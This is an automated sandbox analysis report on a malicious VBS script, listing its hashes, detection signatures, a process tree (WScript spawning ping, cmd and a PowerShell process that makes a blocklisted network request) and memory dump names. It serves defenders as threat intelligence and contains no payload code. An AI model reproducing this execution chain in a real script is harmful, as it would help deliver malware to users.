Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    12/06/2024, 15:10

General

  • Target

    1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs

  • Size

    132KB

  • MD5

    77818ebbfbaed2bcdf22c0132e7ab103

  • SHA1

    1c863ef727d3d363de06909c1eab3d3206a45f91

  • SHA256

    1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859

  • SHA512

    15fa46e9ac136559638731e2257a847fc4aca1e86d2db29465357e6ec54f820a5b9da7dc2749d1a8fc283435ae51b9cdc655fc9ae3e8a83a03422972b1e59b3f

  • SSDEEP

    3072:fwuzkYMPZJqaVBsPHFBktYkCeJ+URvMP/Rj5mk36VYK4qhU4IsMMBlKcUWLZ:f7kYMPZoaVBsPHFBqYkR+URkP/Rj5mjN

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 62 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\System32\ping.exe
      ping google.com -n 1
      2⤵
      • Runs ping.exe
      PID:1716
    • C:\Windows\System32\ping.exe
      ping %.%.%.%
      2⤵
      • Runs ping.exe
      PID:3036
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c dir
      2⤵
        PID:2288
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Diomedes.Met && echo t"
          3⤵
            PID:2844

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2672-4-0x0000000002AB0000-0x0000000002B30000-memory.dmp
    Filesize 512KB

  • memory/2672-5-0x000000001B630000-0x000000001B912000-memory.dmp
    Filesize 2.9MB

  • memory/2672-6-0x0000000002860000-0x0000000002868000-memory.dmp
    Filesize 32KB

  • memory/2672-7-0x0000000002AB0000-0x0000000002B30000-memory.dmp
    Filesize 512KB